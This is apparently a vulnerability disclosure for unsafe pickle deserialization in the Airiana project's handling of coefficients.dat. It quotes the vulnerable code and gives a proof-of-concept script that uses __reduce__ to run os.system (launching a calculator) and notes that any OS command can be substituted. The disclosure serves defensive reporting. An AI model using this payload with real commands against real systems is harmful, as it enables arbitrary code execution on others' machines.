### Critical Vulnerability Information #### Vulnerability Type - **Unsafe Deserialization**: Remote Code Execution (RCE) via `pickle.load()`. #### Vulnerability Description - The script loads data from the `coefficients.dat` file without validating its contents, using Python’s `pickle.load()` method. - An attacker can replace the `.dat` file with a malicious payload to execute arbitrary code. #### Vulnerable Code ```python file = open("coefficients.dat", "rb") a = pickle.load(file) ``` #### Reproduction Steps 1. Clone the repository: ```bash git clone https://github.com/BeamCtrl/Airiana ``` 2. Navigate to the `Airiana` directory: ```bash cd Airiana ``` 3. Use the following Python script to create a malicious `coefficients.dat` file: ```python import pickle import os class Evil: def __reduce__(self): return (os.system, ("gnome-calculator",)) # Replace with any OS command payload = pickle.dumps(Evil()) with open("coefficients.dat", "wb") as f: f.write(payload) ``` 4. Run the vulnerable script: ```bash python3 coef ``` 5. Observe the result: The calculator or any other arbitrary system command will be executed. #### Impact - Attackers can exploit this vulnerability to execute arbitrary system commands, leading to Remote Code Execution (RCE).